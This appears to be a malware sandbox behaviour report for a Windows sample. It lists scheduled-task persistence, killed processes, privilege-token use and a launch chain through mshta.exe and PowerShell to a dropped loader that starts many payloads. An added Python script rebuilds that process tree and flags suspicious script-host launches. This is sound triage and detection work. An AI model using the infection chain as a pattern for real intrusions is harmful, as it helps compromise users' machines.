N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\gmwu\wtrpqgw.exe N/A
N/A N/A C:\ProgramData\gmwu\wtrpqgw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
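
The "Suspicious use of WriteProcessMemory" table that follows lists every parent-to-child memory write the sandbox saw, and because a parent writes into the child it has just created (the row is repeated for each write), the de-duplicated PID pairs are the launch chain: sample → mshta.exe → powershell.exe → a dropped EXE in Temp → rapes.exe, which then starts most of the numbered payloads. The script below is an added example, not sandbox tooling, that rebuilds that tree and pulls out two triage signals from it. SAMPLE_ROWS is constructed from a subset of the table's rows (one repeat kept on purpose); the INTERPRETERS set and USER_WRITABLE prefixes are assumptions made for the example.

```python
"""Rebuild a detonation's process tree from 'wrote to memory of' rows.

Added example, not sandbox tooling: a parent writes into a child it has just
created, so the de-duplicated (parent PID, child PID) pairs are the launch
chain. SAMPLE_ROWS is constructed from a subset of this report's table (one
repeated row kept on purpose); INTERPRETERS and USER_WRITABLE are assumptions
made for the example.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

SAMPLE_ROWS = r'''
PID 3160 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\cmd.exe
PID 3160 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\mshta.exe
PID 432 wrote to memory of 1208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2964 wrote to memory of 2096 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2096 wrote to memory of 2636 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE
PID 2636 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 5068 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe
PID 5068 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe
PID 2184 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe
PID 5068 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 1724 wrote to memory of 1124 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 1124 wrote to memory of 2056 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5068 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 644 wrote to memory of 3580 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 3580 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 5068 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe
PID 2256 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe C:\Windows\SysWOW64\cmd.exe
PID 2256 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe C:\Windows\SysWOW64\mshta.exe
PID 2264 wrote to memory of 1588 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5068 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
'''

# The parent image ends in .exe and is followed by a space, then the child image.
ROW = re.compile(r'^PID (?P<ppid>\d+) wrote to memory of (?P<pid>\d+) N/A '
                 r'(?P<parent>.+?\.[Ee][Xx][Ee]) (?P<child>\S.*)$')
INTERPRETERS = {'cmd.exe', 'powershell.exe', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'rundll32.exe'}
USER_WRITABLE = ('\\appdata\\local\\', '\\appdata\\roaming\\', '\\programdata\\', '\\users\\public\\')


@dataclass
class Process:
    pid: int
    image: str
    ppid: Optional[int] = None
    children: list = field(default_factory=list)  # child PIDs in launch order

    @property
    def name(self):
        return self.image.rsplit('\\', 1)[-1].lower()


def build_tree(rows):
    """Map PID -> Process; repeated rows for one launch collapse into one edge."""
    procs = {}
    for line in rows.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        ppid, pid = int(m['ppid']), int(m['pid'])
        parent = procs.setdefault(ppid, Process(ppid, m['parent']))
        child = procs.setdefault(pid, Process(pid, m['child']))
        if child.ppid is None:
            child.ppid = ppid
            parent.children.append(pid)
    return procs


def roots(procs):
    return sorted(p.pid for p in procs.values() if p.ppid is None)


def ancestry(procs, pid):
    """PIDs from the tree root down to pid."""
    chain = []
    while pid is not None:
        chain.append(pid)
        pid = procs[pid].ppid
    return chain[::-1]


def fanout(procs, min_children=3):
    """Processes that launched many children: the loader stage of the chain."""
    return {p.pid: len(p.children) for p in procs.values() if len(p.children) >= min_children}


def interpreter_launches(procs):
    """(interpreter PID, child PID) where a script host started a binary from a user-writable path."""
    return [(p.pid, c) for p in procs.values() if p.name in INTERPRETERS
            for c in p.children if any(s in procs[c].image.lower() for s in USER_WRITABLE)]


def render(procs, pid=None, depth=0):
    """Indented one-line-per-process view of the tree."""
    lines = []
    for start in ([pid] if pid is not None else roots(procs)):
        p = procs[start]
        lines.append('  ' * depth + f'{p.pid} {p.name}')
        for c in p.children:
            lines.extend(render(procs, c, depth + 1))
    return lines


if __name__ == '__main__':
    tree = build_tree(SAMPLE_ROWS)
    print('\n'.join(render(tree)))
    print('loader fan-out:', fanout(tree))
    print('interpreter -> payload:', interpreter_launches(tree))
```

On this subset the only interpreter-to-payload edge is powershell.exe (2096) starting the EXE written under AppData\Local, and the only process above the fan-out threshold is rapes.exe (5068); cmd.exe and mshta.exe starting schtasks.exe or powershell.exe from the Windows directory are deliberately not flagged, since that pattern is too common in benign installers to be a signal on its own.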

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3160 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\cmd.exe
PID 3160 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\cmd.exe
PID 3160 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\cmd.exe
PID 3160 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\mshta.exe
PID 3160 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\mshta.exe
PID 3160 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe C:\Windows\SysWOW64\mshta.exe
PID 432 wrote to memory of 1208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 432 wrote to memory of 1208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 432 wrote to memory of 1208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2964 wrote to memory of 2096 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2964 wrote to memory of 2096 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2964 wrote to memory of 2096 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2096 wrote to memory of 2636 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE
PID 2096 wrote to memory of 2636 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE
PID 2096 wrote to memory of 2636 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE
PID 2636 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2636 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2636 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 5068 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe
PID 5068 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe
PID 2184 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe
PID 2184 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe
PID 5068 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
PID 5068 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
PID 5068 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
